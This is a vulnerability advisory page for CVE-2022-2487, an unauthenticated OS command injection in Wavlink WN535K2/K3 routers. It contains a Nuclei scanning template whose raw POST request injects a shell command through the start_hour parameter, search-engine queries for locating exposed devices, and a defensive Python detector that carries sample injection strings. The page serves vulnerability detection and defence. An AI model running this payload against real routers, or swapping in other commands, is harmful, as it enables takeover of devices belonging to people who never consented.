
Wavlink WN535K2/WN535K3 - OS Command Injection

2022-07-20 18:16:04
ProjectDiscovery (github.com)
Tags: cve2022, iot, wavlink, router, rce, os command injection

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.4
Confidence: High

EPSS: 0.974
Percentile: 99.9%

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
id: CVE-2022-2487

info:
  name: Wavlink WN535K2/WN535K3 - OS Command Injection
  author: For3stCo1d
  severity: critical
  description: |
    Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
    - https://vuldb.com/?id.204538
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2487
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-2487
    cwe-id: CWE-78
    epss-score: 0.97404
    epss-percentile: 0.99916
    cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wl-wn535k2_firmware
    shodan-query:
      - http.title:"Wi-Fi APP Login"
      - http.title:"wi-fi app login"
    fofa-query: title="wi-fi app login"
    google-query: intitle:"wi-fi app login"
  tags: cve,cve2022,iot,wavlink,router,rce,oast
variables:
  cmd: "id"

http:
  - raw:
      - |
        @timeout: 10s
        POST /cgi-bin/nightled.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=night_led&start_hour=;{{cmd}};

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "nightStart"
        condition: and

      - type: word
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d5efea1d7e0aebaf8dcf58938cef6794ce2b8e92534ab5030ce01c9f54fa46570220668b520a1f400bed5e9f77206b98c2c7a3bfdec16b01741ff05a4acf9336aa76:922c64590222798bb761d5b6d8e72950
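
A defensive check for the parameter described above, as an added example that is not part of the original page or the ProjectDiscovery template: it classifies logged requests to /cgi-bin/nightled.cgi by whether start_hour carries shell metacharacters or is otherwise not a plain hour. The 0-23 range for a legitimate value, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/cgi-bin/nightled.cgi"   # endpoint named in the advisory
PARAM = "start_hour"                    # injectable argument named in the advisory
# Assumption: a legitimate value is an hour of the day, 0-23.
VALID_HOUR = re.compile(r"(?:[01]?[0-9]|2[0-3])")
# Characters a shell treats as separators, substitution or redirection.
SHELL_META = set(";|&`$()<>\n\r")


def form_values(body, name):
    """Return every decoded value of `name` in a urlencoded body."""
    values = []
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(raw))
    return values


def classify(method, path, body):
    """Return 'ignore', 'ok', 'invalid' or 'injection' for one request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return "ignore"
    verdict = "ok"
    for value in form_values(body, PARAM):
        if SHELL_META & set(value):
            return "injection"      # metacharacter present after URL-decoding
        if not VALID_HOUR.fullmatch(value):
            verdict = "invalid"     # not an hour, but no shell syntax seen
    return verdict


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", "/cgi-bin/nightled.cgi", "page=night_led&start_hour=22"),
    ("POST", "/cgi-bin/nightled.cgi", "page=night_led&start_hour=;id;"),
    ("POST", "/cgi-bin/nightled.cgi", "page=night_led&start_hour=%3Bid%3B"),
    ("POST", "/cgi-bin/nightled.cgi", "page=night_led&start_hour=25"),
    ("GET", "/index.html", ""),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(*sample), sample[2])
```

Values are URL-decoded before inspection so that percent-encoded separators are classified the same way as literal ones.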
